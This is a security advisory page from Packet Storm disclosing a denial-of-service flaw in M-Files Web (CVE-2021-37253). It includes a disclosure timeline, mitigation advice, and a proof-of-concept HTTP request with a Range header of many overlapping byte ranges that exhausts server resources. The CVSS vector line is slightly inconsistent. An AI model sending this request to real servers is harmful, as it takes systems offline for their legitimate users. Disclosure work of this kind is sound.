exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

M-Files Web Denial Of Service

M-Files Web Denial Of Service
Posted Dec 3, 2021
Authored by Murat Aydemir

M-Files Web versions prior to 20.10.9524.1 and M-Files Web versions prior to 20.10.9445.0 contain an improper range header processing vulnerability. A remote unauthenticated attacker may send crafted requests with overlapping ranges (via HTTP requests with a specially-crafted Range or Request-Range headers) to cause the web application to compress each of the requested bytes, resulting in a crash due to excessive memory and CPU consumption and preventing users from accessing the system.

tags | exploit, remote, web, denial of service
advisories | CVE-2021-37253
SHA-256 | 156f6be8e8269992c6311ee1cad599e1338e7f7bf24b2810bb20c39727986b7c

M-Files Web Denial Of Service

Change Mirror Download
I. SUMMARY
=============================================================================================================================================================
Title: M-Files Web Improper Range Header Processing Denial of Services
(DoS) Vulnerability
Product: M-Files Web version before 20.10.9524.1, M-Files Web version
before 20.10.9445.0
Vulnerability Type(s): Denial of Services (DoS)
Credit by/Researcher: Murat Aydemir (Turkey)
Contact: https://twitter.com/mrtydmr75
Github: https://github.com/murataydemir
=============================================================================================================================================================

II. CVE REFERENCE, CVSS SCORES & VULNERABILITY TYPES
=============================================================================================================================================================
CVE Number: CVE-2021-37253
CVSSv3 Score: 4.3
CVSSv3 Vector: CVSS:4.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L)
Severity: Medium
Confidentiality Impact: None (There is no impact to the confidentiality of
the system)
Integrity Impact: None (There is no impact to the integrity of the system)
Availability Impact: Complete (There is a total shutdown of the affected
resource. The attacker can render the resource completely unavailable)
Access Complexity: Low (Specialized access conditions or extenuating
circumstances do not exist. Very little knowledge or skill is required to
exploit)
Authentication: Not required (Authentication is not required to exploit the
vulnerability)
Gained Access: None
Vulnerability Type(s): Denial of Services (DoS)
CWE ID: CWE-399 Resource Management Errors (
https://cwe.mitre.org/data/definitions/399.html)
=============================================================================================================================================================

III. TIMELINE
=============================================================================================================================================================
Contact to Vendor: the 24th of August, 2020
Vendor (M-Files) Reply: the 3rd of November, 2020 (rejected vulnerability)
Contact to Vendor: the 4th of November, 2020 (provide additional
informations & some of proof of concepts)
Vendor (M-Files) Reply: the 6th of November, 2020 (accepted vulnerability
and ask time to fix)
Vendor (M-Files) Reply: the 4th of August, 2021 (inform me that "we're
accepting this vulnerability but we'll not give an effort to fix that and
also will not apply any CVE for this vuln.")
Contact to MITRE: the 4th of August, 2021 (contacted MITRE and applied for
CVE. MITRE has reserved CVE to me for this vulnerability)
=============================================================================================================================================================

IV. DESCRIPTION & MITIGATION
=============================================================================================================================================================
M-Files Web version before 20.10.9524.1 and M-Files Web version before
20.10.9445.0 contain an Improper Range Header Processing Vulnerability. A
remote unauthenticated attacker may send crafted requests with overlapping
ranges (via HTTP requests with a specially-crafted Range or Request-Range
headers) to cause the web application to compress each of the requested
bytes, resulting in a crash due to excessive memory and CPU consumption and
preventing users from accessing the system.

Even if this vulnerability (CVE-2021-37253) has been verified and accepted
by the Vendor (M-Files), their security team also contacted me and informed
me that no effort will be given to fixing this vulnerability. Thus, there
is no active patch, update or mitigation plan for CVE-2021-37253
vulnerability. These are not exactly fix the problem (maybe just
remediation), however I strongly recommend you to restrict IP addresses for
web applications which incoming requests/clients or reconfigure the web
server for "Byte-range Request Segment Size" as soon as possible.
=============================================================================================================================================================

V. PROOF OF CONCEPT (POC) FOR CVE-2021-37253
=============================================================================================================================================================
This is easy to detect and exploit for this vulnerability. Just find a
static content (such as .png, .jpg, .jpeg, .js, .css and so on) and make a
request as follows.

GET /Icons/Standard/Listing/VaultMounting.png HTTP/1.1
Host: <host>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0)
Gecko/20100101 Firefox/79.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Range:
bytes=0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-

Note: this issue is valid and easly reproducable for all static assests
(which has .png, .jpg, .jpeg, .js, .css, .gif extensions and so on)
=============================================================================================================================================================

VI. REFERENCE(S)
=============================================================================================================================================================
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37253
https://nvd.nist.gov/vuln/detail/CVE-2021-37253
=============================================================================================================================================================


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close